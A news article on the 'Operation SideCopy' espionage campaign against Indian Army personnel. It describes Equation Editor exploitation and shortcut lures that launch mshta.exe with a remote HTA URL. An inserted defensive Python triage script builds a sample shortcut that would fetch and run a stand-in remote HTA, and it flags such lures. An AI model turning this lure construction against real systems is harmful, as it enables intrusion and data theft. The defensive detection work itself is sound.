Cybersecurity solutions provider Quick Heal revealed evidence of a cyber espionage campaign, “Operation SideCopy”, run by an advanced persistent threat (APT) group that has targeted Indian Army personnel since 2019 to steal sensitive information. The team at Seqrite, Quick Heal’s enterprise security brand, linked several older campaigns and attacks from the past year to the Operation SideCopy group through shared IOCs (indicators of compromise).
Exploiting Equation Editor Flaw
Seqrite observed three infection chains in which the attackers exploited the Microsoft Office Equation Editor vulnerability (CVE-2017-11882) as the initial infection vector. The malware was distributed as an email attachment: a ZIP archive containing either an LNK (Windows shortcut) file or a DOC file.
“The victim receives LNK files, compressed into ZIP/RAR, via emails. These files are shortcuts that execute mshta.exe, providing a remote HTA URL as the parameter. The LNKs have a double extension with document icons to trick the victim into opening the file. Victims just have to execute the LNK files, and the rest of the modules follow in the background,” Seqrite stated.
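The lure described above is a Windows shortcut whose target is mshta.exe and whose argument is a remote HTA URL, disguised with a document-style double extension. Both properties are readable straight from the .lnk file, so a triage script can flag such attachments without executing them. The following is an added example, not code from the Seqrite report or Quick Heal: it parses the fixed header and the StringData section of a Shell Link file (per the MS-SHLLINK format), builds a constructed sample shortcut in memory so it runs offline, and flags the two indicators the quote names. The file name, target path and URL (example.invalid) are all made up for illustration.

```python
import re
import struct
from pathlib import PureWindowsPath

# LinkFlags bits from the MS-SHLLINK ShellLinkHeader.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
# CLSID 00021401-0000-0000-C000-000000000046, little-endian as stored on disk.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData fields appear in this fixed order, each only if its flag is set.
STRING_FIELDS = [
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
]

DOC_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx"}


def parse_lnk(data: bytes) -> dict:
    """Parse the header, skip IDList/LinkInfo, and decode the StringData strings."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index = struct.unpack_from("<i", data, 56)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:       # u16 size, then that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                 # u32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "icon_index": icon_index}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            info[key] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return info


def build_lnk(relative_path: str, arguments: str, icon_location: str,
              unicode: bool = True) -> bytes:
    """Build a minimal shortcut (header + StringData only). Test fixture, not a real lure."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION
    if unicode:
        flags |= IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))   # remaining header fields zeroed
    body = b""
    for s in (relative_path, arguments, icon_location):
        body += struct.pack("<H", len(s))
        body += s.encode("utf-16-le") if unicode else s.encode("cp1252")
    return header + body


def assess_lnk(filename: str, data: bytes) -> list:
    """Return the reasons a shortcut matches the SideCopy-style lure (empty list = nothing flagged)."""
    info = parse_lnk(data)
    reasons = []
    suffixes = [s.lower() for s in PureWindowsPath(filename).suffixes]
    if len(suffixes) >= 2 and suffixes[-1] == ".lnk" and suffixes[-2] in DOC_EXTS:
        reasons.append("document-style double extension: " + filename)
    target = PureWindowsPath(info["relative_path"] or "").name.lower()
    args = info["arguments"] or ""
    if target == "mshta.exe" and re.search(r"https?://", args, re.I):
        reasons.append("mshta.exe launched with remote HTA: " + args)
    return reasons


# Constructed sample: hypothetical file name, path and URL, not a real campaign artefact.
SAMPLE_NAME = "Defence_Production_Policy.docx.lnk"
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe",
                       "http://example.invalid/update.hta",
                       r"%SystemRoot%\System32\shell32.dll")

if __name__ == "__main__":
    for reason in assess_lnk(SAMPLE_NAME, SAMPLE_LNK):
        print("FLAG:", reason)
```

The parser reads only the RELATIVE_PATH string; real shortcuts may carry the target solely in the LinkTargetIDList, and attackers can obfuscate the mshta argument, so treat this as a triage signal rather than a complete detector.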
Key Findings
- This cyber operation targets only the Indian defence forces and armed forces personnel.
- The malware modules seen are constantly under development, and updated modules are released after reconnaissance of victim data.
- The actors are keeping track of malware detections and updating modules when they are detected by AV.
- Almost all CnC servers belong to Contabo GmbH, and server names are similar to machine names found in the Transparent Tribe report.
- This threat actor is misleading the security community by copying TTPs that point at the Sidewinder APT group.
- We suspect this threat actor has links with the Transparent Tribe APT group.
Growing Cyberattacks on Indians
Recently, the Indian Computer Emergency Response Team (CERT-In) stated that it recorded over 1.45 million cybersecurity incidents, including breaches and hacks, between 2015 and 2020. According to India’s Ministry of Electronics and Information Technology (MeitY), CERT-In reported 49,455, 50,362, 53,117, 208,456, 394,499 and 696,938 cybersecurity incidents in 2015, 2016, 2017, 2018, 2019 and 2020 (till August) respectively. The figures were released after the ministry was asked about growing cyberattacks targeting Indian citizens as well as commercial and legal entities.